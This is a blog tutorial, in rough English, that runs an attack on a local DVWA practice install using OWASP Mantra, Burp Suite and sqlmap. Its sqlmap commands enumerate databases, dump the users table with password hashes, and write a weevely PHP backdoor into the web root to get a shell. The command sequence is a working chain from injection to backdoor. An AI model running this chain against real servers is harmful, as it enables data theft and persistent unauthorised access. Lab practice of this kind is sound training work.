Mantra
is a collection of free and open source tools integrated into a web
browser, which can become handy for students, penetration testers,
web application developers,security professionals etc. It is
portable, ready-to-run, compact and follows the true spirit of free
and open source software.
first open Mantra Tools on Backtrack Menu. Type the command
root@bt:/pentest/web/mantra# ls
Mantra OWASP Mantra
root@bt:/pentest/web/mantra# ./OWASP\ Mantra
Show it
Burp Suite
Burp
Suite is an integrated platform for performing security testing of
web applications. Its various tools work seamlessly together to
support the entire testing process, from initial mapping and analysis
of an application's attack surface, through to finding and exploiting
security vulnerabilities.
Show It
Now we will try injection in database localhost / dvwa.
Previously, we created a database dvwa.
Type the command
mysql
-u –root -p
mysql> create database dvwa;
then, try to go to localhost / dvwa in browser spell.
user: admin
password: password
If success, set the DVWA Security to Low. And then choose SQL Injection
before we have the proxy settings
type up to us (test) in the User Id Column- SUBMIT .
LOOK On Burp Suite. We Will get some Iformation of localhost/dvwa
Now, we try on sqlmap
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2" --dbs
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
we will get tables of dvwa database
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql
[03:22:02] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at 03:22:02
after we get the database, look at the table on dvwa. Type the command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#"
--cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2"
-D dvwa --tables
the result is
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
after that, we look at the contents of the users table with type the command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#"
--cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2"
-D dvwa -T users --dump
the result is
Database:
dvwa
Table:
users
[5
entries]
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
|
user_id | user | avatar
| password | last_name |
first_name |
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
|
1 | admin | http://localhost/dvwa/hackable/users/admin.jpg
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin
|
|
2 | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg
| e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon
|
|
3 | 1337 | http://localhost/dvwa/hackable/users/1337.jpg
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack
|
|
4 | pablo | http://localhost/dvwa/hackable/users/pablo.jpg
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo
|
|
5 | smithy | http://localhost/dvwa/hackable/users/smithy.jpg
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob
|
+---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
type the command
root@bt:/pentest/database/sqlmap#
cd
root@bt:~#
/pentest/backdoors/web/weevely/
root@bt:/pentest/backdoors/web/weevely#
ls
root@bt:/pentest/backdoors/web/weevely#
./weevely.py generate password /root/tes.php
after backdoor we make, it's time to upload to var/www/dvwa/tes.php by typing the command
root@bt:/pentest/database/sqlmap#
./sqlmap.py -u
"http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#"
--cookie "security=low; PHPSESSID=ev12eov2elt7kk5cphkld5ehi2"
--file-write=/root/tes.php --file-dest=/var/www/dvwa/tes.php
[22:24:36]
[INFO] the back-end DBMS operating system is Linux
[22:24:36]
[INFO] heuristics detected web page charset 'ascii'
do
you want confirmation that the file '/var/www/dvwa/tes.php' has been
successfully written on the back-end DBMS file system? [Y/n] choose Y or Enter
and Then, Upload the backdoor tho DVWA Database
Type the command
root@bt:/pentest/backdoors/web/weevely#./weevely.py
http://localhost/dvwa/tes.php password
then,
www-data@bt:/var/www/dvwa$
ls
if successful, it will display the results
Good Luck ..
Tidak ada komentar:
Posting Komentar